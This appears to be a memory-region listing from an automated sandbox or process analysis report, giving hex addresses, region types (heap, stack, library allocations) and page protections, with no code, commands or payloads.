trusted library allocation
page read and write
2D2E0F9B000
trusted library allocation
page read and write
201E07E4000
heap
page read and write
201E08CC000
heap
page read and write
95D000
trusted library allocation
page execute and read and write
7FFE7CE86000
trusted library allocation
page execute and read and write
FFAFF5E000
stack
page read and write
201E068B000
heap
page read and write
201DEB4C000
heap
page read and write
2D2D2DB7000
trusted library allocation
page read and write
201E07F0000
heap
page read and write
716E000
stack
page read and write
201DEB4A000
heap
page read and write
7FFE7CF51000
trusted library allocation
page read and write
2D2E9224000
heap
page read and write
201E0649000
heap
page read and write
201E06F2000
heap
page read and write
201E0711000
heap
page read and write
788000
heap
page read and write
2D2D11AC000
trusted library allocation
page read and write
4C41000
trusted library allocation
page read and write
4551000
trusted library allocation
page read and write
ED0000
trusted library allocation
page read and write
5696000
trusted library allocation
page read and write
72E0000
trusted library allocation
page read and write
201E0808000
heap
page read and write
FFB083E000
stack
page read and write
7D8D000
stack
page read and write
201E06CB000
heap
page read and write
6E0000
heap
page read and write
7060000
heap
page execute and read and write
201E0730000
heap
page read and write
201DEB45000
heap
page read and write
7DF0000
trusted library allocation
page read and write
7FFE7CDC0000
trusted library allocation
page read and write
72C0000
trusted library allocation
page read and write
2D2E91D0000
heap
page read and write
7FFE7D020000
trusted library allocation
page read and write
201E064E000
heap
page read and write
2D2E9226000
heap
page read and write
A64000
heap
page read and write
6E2E000
stack
page read and write
2D2E93FF000
heap
page read and write
7FFE7CF40000
trusted library allocation
page read and write
2D2D0B70000
heap
page execute and read and write
7FFE7D010000
trusted library allocation
page read and write
1F10B8A000
stack
page read and write
43DC000
stack
page read and write
201E0657000
heap
page read and write
2D2D0B00000
trusted library allocation
page read and write
942296A000
stack
page read and write
201DE8FD000
heap
page read and write
2D2D27B5000
trusted library allocation
page read and write
7D20000
heap
page read and write
BFDB000
direct allocation
page execute and read and write
201E0696000
heap
page read and write
201E070B000
heap
page read and write
2D2D12CE000
trusted library allocation
page read and write
7FFE7CDA4000
trusted library allocation
page read and write
82A0000
trusted library allocation
page execute and read and write
7FFE7D090000
trusted library allocation
page read and write
201DEB4E000
heap
page read and write
4B46000
trusted library allocation
page read and write
2D2E94C5000
heap
page read and write
FFB037C000
stack
page read and write
A1F000
heap
page read and write
201E07E2000
heap
page read and write
8010000
trusted library allocation
page read and write
201E0632000
heap
page read and write
2D2E93D0000
heap
page read and write
7290000
trusted library allocation
page read and write
785000
heap
page read and write
950000
trusted library allocation
page read and write
201DE8FC000
heap
page read and write
FFB047E000
stack
page read and write
9FD000
heap
page read and write
1F10EFE000
stack
page read and write
201E0817000
heap
page read and write
FFAFFDE000
stack
page read and write
2D2CF201000
heap
page read and write
201E0656000
heap
page read and write
9BF000
heap
page read and write
201DE956000
heap
page read and write
2D2E92D0000
heap
page read and write
7DF4F6670000
trusted library allocation
page execute and read and write
2D2CF1FB000
heap
page read and write
201E0667000
heap
page read and write
72B0000
trusted library allocation
page read and write
1F113FF000
stack
page read and write
44E8000
heap
page read and write
2D2D0BC5000
heap
page read and write
9B3000
heap
page read and write
FFB0577000
stack
page read and write
201E06BA000
heap
page read and write
2D2E9448000
heap
page read and write
201E0656000
heap
page read and write
201DE9A2000
heap
page read and write
201DE8E9000
heap
page read and write
1F10FFE000
stack
page read and write
94229EF000
unkown
page read and write
201E0635000
heap
page read and write
201E07B4000
heap
page read and write
83A0000
direct allocation
page read and write
201E0662000
heap
page read and write
1F114FD000
stack
page read and write
2D2D25CF000
trusted library allocation
page read and write
954000
trusted library allocation
page read and write
FFB027E000
stack
page read and write
C7B000
heap
page read and write
2D2D139E000
trusted library allocation
page read and write
7280000
trusted library allocation
page read and write
7FFE7CF5A000
trusted library allocation
page read and write
FFB09BB000
stack
page read and write
2D2CF203000
heap
page read and write
8140000
trusted library allocation
page read and write
201E0800000
heap
page read and write
1F111FF000
stack
page read and write
201E0656000
heap
page read and write
2D2E949F000
heap
page read and write
201E0630000
heap
page read and write
FFB140E000
stack
page read and write
201E0703000
heap
page read and write
201E07D8000
heap
page read and write
201E0640000
heap
page read and write
686E000
stack
page read and write
7E15000
heap
page read and write
2D2CF1BD000
heap
page read and write
201DEB4A000
heap
page read and write
7FFE7D0B0000
trusted library allocation
page read and write
201E064C000
heap
page read and write
201DE948000
heap
page read and write
7D10000
trusted library allocation
page execute and read and write
201E07E2000
heap
page read and write
201E0808000
heap
page read and write
C15000
trusted library allocation
page execute and read and write
201DE8EA000
heap
page read and write
201E065A000
heap
page read and write
201E06AA000
heap
page read and write
7270000
trusted library allocation
page read and write
6F52000
heap
page read and write
263F3260000
heap
page read and write
7FFE7CDA0000
trusted library allocation
page read and write
201DE9B6000
heap
page read and write
696E000
stack
page read and write
2D2E91C0000
heap
page execute and read and write
201E0657000
heap
page read and write
C10000
trusted library allocation
page read and write
201E07F4000
heap
page read and write
201E0817000
heap
page read and write
732B000
stack
page read and write
201E069E000
heap
page read and write
201E0631000
heap
page read and write
EBE000
stack
page read and write
7E5B000
heap
page read and write
201E06C2000
heap
page read and write
2D2CF355000
heap
page read and write
201DE790000
heap
page read and write
7DCE000
stack
page read and write
201E06E3000
heap
page read and write
2D2D0C90000
heap
page read and write
81AC000
stack
page read and write
201E07E9000
heap
page read and write
201E06D6000
heap
page read and write
8390000
direct allocation
page read and write
98C000
heap
page read and write
7FFE7CF82000
trusted library allocation
page read and write
2D2E0F8D000
trusted library allocation
page read and write
263F3269000
heap
page read and write
81EB000
stack
page read and write
8350000
trusted library allocation
page read and write
2D2D11B7000
trusted library allocation
page read and write
6FC4000
heap
page read and write
7FFE7D0E0000
trusted library allocation
page read and write
201E0672000
heap
page read and write
7FFE7CE56000
trusted library allocation
page read and write
2D2CF110000
heap
page read and write
A7C000
heap
page read and write
FFB0637000
stack
page read and write
2D2CF2E0000
heap
page readonly
82C0000
trusted library allocation
page read and write
2D2CF130000
heap
page read and write
2D2D25EA000
trusted library allocation
page read and write
C30000
trusted library allocation
page read and write
7FFE7CDBB000
trusted library allocation
page read and write
6F40000
heap
page read and write
7FFE7CDA2000
trusted library allocation
page read and write
920000
trusted library section
page read and write
FFAFED3000
stack
page read and write
201E06EB000
heap
page read and write
C58000
trusted library allocation
page read and write
44E0000
heap
page read and write
201E06AF000
heap
page read and write
7FFE7CDA3000
trusted library allocation
page execute and read and write
780000
heap
page read and write
6DEE000
stack
page read and write
2D2E92F0000
heap
page read and write
263F3200000
heap
page read and write
7FFE7CDAD000
trusted library allocation
page execute and read and write
FFB08BE000
stack
page read and write
2D2CF243000
heap
page read and write
201E07FB000
heap
page read and write
7E65000
heap
page read and write
2D2D1A0B000
trusted library allocation
page read and write
2D2CF2F0000
trusted library allocation
page read and write
263F31E0000
heap
page read and write
201E06DE000
heap
page read and write
2D2E92BA000
heap
page read and write
FFB158B000
stack
page read and write
201E06B2000
heap
page read and write
70A0000
trusted library allocation
page read and write
2D2CF030000
heap
page read and write
201E0706000
heap
page read and write
2D2CF1FF000
heap
page read and write
2D2E92A2000
heap
page read and write
44D0000
heap
page execute and read and write
2D2CF1B0000
heap
page read and write
2D2D2102000
trusted library allocation
page read and write
263F31D0000
heap
page read and write
201E07A7000
heap
page read and write
5557000
trusted library allocation
page read and write
6F98000
heap
page read and write
201E07E2000
heap
page read and write
201E0C2A000
heap
page read and write
201E08CB000
heap
page read and write
2D2D277A000
trusted library allocation
page read and write
201E06E6000
heap
page read and write
201E0641000
heap
page read and write
8360000
trusted library allocation
page read and write
201E0655000
heap
page read and write
201E07CC000
heap
page read and write
8000000
trusted library allocation
page read and write
44A5000
heap
page execute and read and write
201DE870000
heap
page read and write
201E0C20000
heap
page read and write
44F1000
trusted library allocation
page read and write
201DEB10000
heap
page read and write
FFB06B9000
stack
page read and write
7FFE7D080000
trusted library allocation
page read and write
7FFE7CFD0000
trusted library allocation
page read and write
54F1000
trusted library allocation
page read and write
201E0656000
heap
page read and write
2D2CF2D0000
trusted library allocation
page read and write
2D2D0CA1000
trusted library allocation
page read and write
FFB03FE000
stack
page read and write
4647000
trusted library allocation
page read and write
6BD0000
heap
page read and write
7FFE7D070000
trusted library allocation
page read and write
7FFE7CE5C000
trusted library allocation
page execute and read and write
449E000
stack
page read and write
201E06EF000
heap
page read and write
FFB02FE000
stack
page read and write
2D2D11EF000
trusted library allocation
page read and write
2D2E949B000
heap
page read and write
2D2D0BC7000
heap
page read and write
7FFE7D130000
trusted library allocation
page read and write
72A0000
trusted library allocation
page read and write
7CD0000
trusted library allocation
page read and write
A1DB000
direct allocation
page execute and read and write
There are 508 hidden memdumps, click here to show them.